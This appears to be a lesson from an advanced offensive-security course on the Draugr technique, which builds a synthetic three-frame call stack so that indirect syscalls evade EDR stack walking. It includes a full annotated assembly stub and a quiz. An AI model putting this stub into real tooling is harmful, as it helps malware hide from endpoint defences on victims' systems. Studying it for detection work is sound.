Difficulty: Advanced

Module 6: Synthetic Frame Construction

Building a three-layer fake stack that survives full unwinding — one precise sub rsp at a time.

Module Overview

This is the core of Draugr. The Spoof assembly routine constructs a three-layer synthetic stack beneath the current execution point. Each layer represents a fake call frame for a legitimate Windows function. When the syscall executes and an EDR walks the stack, it sees: the current function called through BaseThreadInitThunk, which was called by RtlUserThreadStart — exactly what every normal thread looks like. This module walks through each layer, byte by byte.

The Three-Layer Stack Layout

The synthetic stack is constructed from the bottom up (highest address to lowest). The final RSP after construction points to the very top — the gadget address that will be popped by RET after the syscall returns.

Complete Synthetic Stack (Top to Bottom)

[Top of stack — lowest address — RSP points here]
Gadget Address JMP [RBX] ← RSP at syscall time
BaseThreadInitThunk+0x14 frame calculated size from UNWIND_CODEs
RtlUserThreadStart+0x21 frame calculated size from UNWIND_CODEs
0x200 bytes reserved buffer 512 bytes padding
NULL terminator (0x0) stops stack walkers
[Bottom of stack — highest address]

Construction Order

The stack grows downward on x64 (lower addresses = newer frames). Draugr builds from the bottom up:

  1. NULL terminator — pushed first (highest address)
  2. 0x200 buffer — RSP decremented by 512 bytes
  3. RtlUserThreadStart frame — RSP decremented by calculated frame size
  4. BaseThreadInitThunk frame — RSP decremented by calculated frame size
  5. Gadget address — pushed last (lowest address, top of stack)

Layer 1: The Reserved Buffer (0x200 Bytes)

The first allocation after the NULL terminator is a 512-byte reserved buffer at the base of the synthetic stack.

ASM - Buffer allocation    ; Push NULL terminator first (base of stack)
    xor   rax, rax
    push  rax                  ; [rsp] = 0x0 (NULL)

    ; Allocate 0x200 bytes of buffer space
    sub   rsp, 0x200           ; RSP -= 512

Purpose of the Buffer

This 512-byte region provides working space and separation between the NULL terminator and the synthetic frames. Some stack-walking implementations may read memory below the bottom frame. The buffer ensures these reads hit zeroed or benign memory rather than unmapped pages. It also provides alignment padding and prevents the synthetic frames from being immediately adjacent to the stack terminator, which could look suspicious under heuristic analysis.

Layer 2: RtlUserThreadStart Frame

The second layer creates a fake frame for ntdll!RtlUserThreadStart. This is the function that Windows calls to start every user-mode thread. Its frame sits at the bottom of every legitimate call stack.

ASM - RtlUserThreadStart synthetic frame    ; Load RtlUserThreadStart frame size from PRM
    mov   r12, [rbx + 0x48]    ; R12 = RtlUserThreadStart_Size

    ; Allocate the frame
    sub   rsp, r12             ; RSP -= frame size

    ; Write the fake return address at the top of this frame
    mov   r13, [rbx + 0x58]    ; R13 = RtlUserThreadStart + 0x21
    mov   [rsp], r13           ; [RSP] = fake return address

What This Creates

After this code executes, the stack contains a frame that is exactly the size that Windows expects for RtlUserThreadStart. At the top of this frame (lowest address) sits the return address RtlUserThreadStart+0x21. When the stack unwinder processes this frame, it reads the return address, looks up the RUNTIME_FUNCTION for the address, and uses the UNWIND_CODEs to determine how many bytes to skip. Because Draugr calculated the exact same size from the exact same UNWIND_CODEs, the unwinder lands precisely at the NULL terminator — the expected end of the stack.

Layer 3: BaseThreadInitThunk Frame

On top of the RtlUserThreadStart frame, Draugr builds the kernel32!BaseThreadInitThunk frame. In a real thread, this function is called by RtlUserThreadStart and in turn calls the thread's entry point.

ASM - BaseThreadInitThunk synthetic frame    ; Load BaseThreadInitThunk frame size from PRM
    mov   r14, [rbx + 0x40]    ; R14 = BaseThreadInitThunk_Size

    ; Allocate the frame
    sub   rsp, r14             ; RSP -= frame size

    ; Write the fake return address at the top of this frame
    mov   r15, [rbx + 0x50]    ; R15 = BaseThreadInitThunk + 0x14
    mov   [rsp], r15           ; [RSP] = fake return address

Frame Chain

Now the stack unwinder sees a chain: the current frame's return address is BaseThreadInitThunk+0x14. Unwinding that frame (by its UNWIND_CODEs) reveals a return address of RtlUserThreadStart+0x21. Unwinding that frame reveals the NULL terminator. This is identical to what a real thread's stack looks like — the EDR cannot distinguish this synthetic chain from a genuine one.

Unwinder's View of the Synthetic Stack

Current Frame
ret = BaseThreadInitThunk+0x14
BaseThreadInitThunk
ret = RtlUserThreadStart+0x21
RtlUserThreadStart
ret = 0x0 (NULL)
STOP
NULL = end of stack

The Gadget Frame

The final element placed on the stack is the gadget address. This sits at the very top of the synthetic stack (the lowest address). When the syscall returns, the CPU's RET instruction pops this address into RIP.

ASM - Pushing the gadget    ; Load gadget address from PRM
    mov   rax, [rbx + 0x60]    ; RAX = gadget address (JMP [RBX])

    ; Push it as the return address for the syscall
    push  rax                  ; [RSP] = gadget address

Critical Ordering

The gadget address must be the last thing pushed. RSP points to it at the time the syscall instruction executes. When the syscall returns, RET pops the top of the stack into RIP. If the gadget is not at the top, the CPU would jump to the wrong address — either a fake return address or garbage — and crash immediately.

The NULL Terminator

A zero value (0x0) is placed at the very bottom of the synthetic stack, below the 0x200 buffer. This serves as a stack walk terminator.

Why NULL Stops the Walk

Windows stack walking functions like RtlWalkFrameChain and RtlCaptureStackBackTrace iterate through frames by following return addresses. When they encounter a return address of 0x0, they interpret it as the end of the stack and stop. Without this terminator, the walker would continue past the synthetic frames into uncontrolled memory — either reading garbage that exposes the spoof, or causing an access violation.

Real Threads Have This Too

On a genuine Windows thread, the bottom of the stack also terminates with a NULL return address. The OS sets this up when it creates the thread's stack. Draugr replicates this behavior exactly, so even the termination condition is indistinguishable from a real stack.

Stack Argument Copying

The x64 Windows calling convention passes the first four arguments in registers (RCX, RDX, R8, R9). Arguments 5 and beyond are passed on the stack. When Draugr replaces the real stack with the synthetic one, any stack-based arguments must be copied to the correct positions in the new stack.

ASM - Stack argument copying (for >4 argument syscalls)    ; The PRM contains all arguments at offset 0x78+
    ; Arguments 1-4 go in registers (handled separately)
    ; Arguments 5+ must be placed on the stack at [RSP+0x28], [RSP+0x30], etc.

    ; Check if there are stack arguments
    mov   rcx, [rbx + 0x78]    ; arg1 (will go in RCX later)
    mov   rdx, [rbx + 0x80]    ; arg2 (will go in RDX later)
    mov   r8,  [rbx + 0x88]    ; arg3 (will go in R8 later)
    mov   r9,  [rbx + 0x90]    ; arg4 (will go in R9 later)

    ; Copy stack arguments (arg5, arg6, ...) to the synthetic stack
    ; Stack slots at [RSP+0x28], [RSP+0x30], [RSP+0x38], ...
    mov   rax, [rbx + 0x98]    ; arg5
    mov   [rsp + 0x28], rax
    mov   rax, [rbx + 0xA0]    ; arg6
    mov   [rsp + 0x30], rax
    ; ... additional arguments as needed

Why 0x28 and Not 0x20?

The x64 calling convention reserves 32 bytes (0x20) of shadow space on the stack above the return address. Arguments 5+ start at [RSP + 0x28] (shadow space + 8 bytes for the return address). Draugr must respect this layout exactly, or the kernel function will read the wrong values for parameters 5 and beyond. Functions like NtAllocateVirtualMemory take 6 arguments, so getting this right is critical.

Assembly Walkthrough: Complete Construction

Here is the full sequence from the Spoof routine that builds the synthetic stack, loads register arguments, and jumps to the syscall instruction. Read top to bottom — each instruction is annotated with its purpose.

ASM - Stub.s: Synthetic Stack Construction    ; ---- Save original state ----
    mov   rbx, rcx             ; RBX = &PRM (anchor pointer)
    mov   rax, [rsp]           ; Save original return address
    mov   [rbx + 0x08], rax    ; PRM.OG_retaddr = original return

    ; ---- Save non-volatile registers ----
    mov   [rbx + 0x10], rdi
    mov   [rbx + 0x18], rsi
    mov   [rbx + 0x20], r12
    mov   [rbx + 0x28], r13
    mov   [rbx + 0x30], r14
    mov   [rbx + 0x38], r15

    ; ---- Layer 0: NULL terminator ----
    xor   rax, rax
    push  rax                  ; Stack bottom = 0x0

    ; ---- Layer 1: Reserved buffer ----
    sub   rsp, 0x200           ; 512 bytes of padding

    ; ---- Layer 2: RtlUserThreadStart frame ----
    mov   r12, [rbx + 0x48]   ; R12 = RtlUserThreadStart frame size
    sub   rsp, r12             ; Allocate frame
    mov   r13, [rbx + 0x58]   ; R13 = RtlUserThreadStart + 0x21
    mov   [rsp], r13           ; Write fake return address

    ; ---- Layer 3: BaseThreadInitThunk frame ----
    mov   r14, [rbx + 0x40]   ; R14 = BaseThreadInitThunk frame size
    sub   rsp, r14             ; Allocate frame
    mov   r15, [rbx + 0x50]   ; R15 = BaseThreadInitThunk + 0x14
    mov   [rsp], r15           ; Write fake return address

    ; ---- Gadget: top of stack ----
    mov   rax, [rbx + 0x60]   ; RAX = gadget address (JMP [RBX])
    push  rax                  ; RSP now points to gadget

    ; ---- Load syscall arguments into registers ----
    mov   r10, [rbx + 0x78]   ; R10 = arg1 (R10, not RCX for syscall)
    mov   rdx, [rbx + 0x80]   ; RDX = arg2
    mov   r8,  [rbx + 0x88]   ; R8  = arg3
    mov   r9,  [rbx + 0x90]   ; R9  = arg4

    ; ---- Load SSN and jump to syscall ----
    mov   rax, [rbx + 0x68]   ; RAX = System Service Number
    mov   r11, [rbx + 0x70]   ; R11 = syscall instruction address
    jmp   r11                  ; Jump to: syscall; ret in ntdll

Why R10 Instead of RCX?

In the Windows syscall convention, the kernel expects the first argument in R10, not RCX. This is because the syscall instruction itself uses RCX to store the return address (RIP). The standard ntdll stub does mov r10, rcx before the syscall. Since Draugr jumps directly to the syscall instruction (bypassing the stub preamble), it must place the first argument in R10 manually.

Why JMP Instead of CALL?

The Spoof routine uses jmp r11 (not call r11) to reach the syscall instruction. A CALL would push an additional return address onto the stack, misaligning the carefully constructed synthetic stack. The JMP transfers control without modifying RSP. The syscall instruction in ntdll is followed by RET, which will pop the gadget address from RSP — exactly as intended.

Module 6 Quiz: Synthetic Frame Construction

Q1: In what order are the synthetic stack layers constructed (first pushed to last pushed)?

The stack grows downward, so the first item pushed ends up at the highest address (bottom). NULL is pushed first, then the buffer is allocated, then the RtlUserThreadStart frame, then the BaseThreadInitThunk frame, and finally the gadget address is pushed on top. RSP points to the gadget at syscall time.

Q2: What is the purpose of the NULL terminator at the bottom of the synthetic stack?

Functions like RtlWalkFrameChain treat a NULL return address as the end of the call chain. Without it, the walker would continue into whatever memory lies beyond the synthetic stack, either producing garbage frames that expose the spoof or causing an access violation.

Q3: Why must each synthetic frame be exactly the size calculated from the target function's UNWIND_CODEs?

The stack unwinder reads the UNWIND_CODEs for each function and uses them to calculate how many bytes to advance RSP to reach the previous frame. If a synthetic frame is the wrong size, the unwinder will land at the wrong position, reading garbage as the next return address. The frame sizes must match exactly so the unwinder walks cleanly from frame to frame.